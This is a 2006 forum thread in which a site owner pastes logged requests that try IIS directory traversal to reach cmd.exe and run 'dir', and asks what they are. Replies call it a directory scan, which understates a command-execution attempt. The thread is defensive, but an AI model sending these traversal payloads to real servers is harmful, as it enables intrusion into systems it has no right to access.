What's happening here?
Hi,
Just looking at who was online on my site and i came across a (chinese) isp address looking at my site with the following code, one to each attempt, on to my address.
It doesn't look nice, and i have hopefully now blocked it, but does anyone know what they are specifically trying to do? My backend put in the '..?..?..?..', so i can't help with that bit.
/cgi-bin/..?..?..?../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..?..?..?../winnt/system32/cmd.exe?/c+dir
/_mem_bin/..?..?..?../winnt/system32/cmd.exe?/c+dir
/msadc/..?..?..?../winnt/system32/cmd.exe?/c+dir
/msadc/..?../..?../..?../winnt/system32/cmd.exe?/c+dir
/scripts/..?..?..?..?../winnt/system32/cmd.exe?/c+dir
/scripts/..?../winnt/system32/cmd.exe?/c+dir
/scripts/..?..?..?..?../winnt/system32/cmd.exe?/c+dir
/scripts/..?../winnt/system32/cmd.exe?/c+dir Thanks
Paul
JoseffB posted this at 18:29 — 23rd October 2006.
He has: 52 posts
Joined: Oct 2006
It looks like they were trying to scan your directory structure.
horsetags posted this at 18:33 — 23rd October 2006.
They have: 4 posts
Joined: May 2006
That's what i thought, but didn't know if they were trying to write to the site somehow.
Want to join the discussion? Create an account or log in if you already have one. Joining is fast, free and painless! We’ll even whisk you back here when you’ve finished.